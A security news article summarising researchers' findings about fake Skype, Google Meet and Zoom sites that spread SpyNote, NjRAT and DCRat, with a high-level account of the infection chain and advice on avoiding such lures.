Researchers discovered a threat actor creating fraudulent websites for spreading malware, including SpyNote RAT for Android and NjRAT and DCRat for Windows, in December 2023. These RATs can steal confidential information and log keystrokes. Users are lured through fake online meeting sites impersonating brands like Skype, Google Meet, and Zoom. 

The actor used shared web hosting, hosting all fake sites on a single IP address in Russian, and URLs that closely resembled the actual websites. The attackers distributed multiple malware families using these fake websites, posing a significant threat to innocent users.

To download the software, users must either click the Android or Windows buttons. When they click on Android, a malicious APK file gets downloaded, whereas clicking on the Windows button triggers the download of a BAT file, which automates tasks and performs additional actions, such as downloading a RAT payload.

A campaign imitating legitimate online meeting platforms is a significant threat, with fake sites mimicking their appearance and functionality. In December, as noted by Zscaler in a blog post, a fake Skype site, join-skypeinfo, was created to trick users into downloading the application, leading to a BAT file and a WinRAR archive file. 

The fake Google Meet site, online-cloudmeetingpro, was hosted on a subpath resembling a joining link. The fake Zoom sites have URLs with genuine Zoom meeting IDs that increase the risk of falling victim to the scam. 

These fake websites also contained an open directory with NjRAT executable files, suggesting the attacker may use them in other campaigns. 

Fake Skype, Zoom and Google Meets websites identified by researchers (Screenshot via Zscaler)

Such campaigns can have devastating consequences. RATs can compromise devices, allowing attackers to steal sensitive information, monitor user activity, and potentially control the infected device.

To protect yourself, double-check URLs, verify meeting invitations, download software from official sources, and use antivirus and anti-malware software. Beware of fake websites, verify meeting invitations, and download applications from official sources.

1.  Konni RAT Exploiting Word Docs to Steal Data from Windows
2.  Fake Chrome Browser Update Installs NetSupport Manager RAT
3.  Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain
4.  AsyncRAT Infiltrates Key US Infrastructure Through GIFs and SVGs
5.  Popular Android Screen Recorder iRecorder App Revealed as Trojan

Tag

#vmware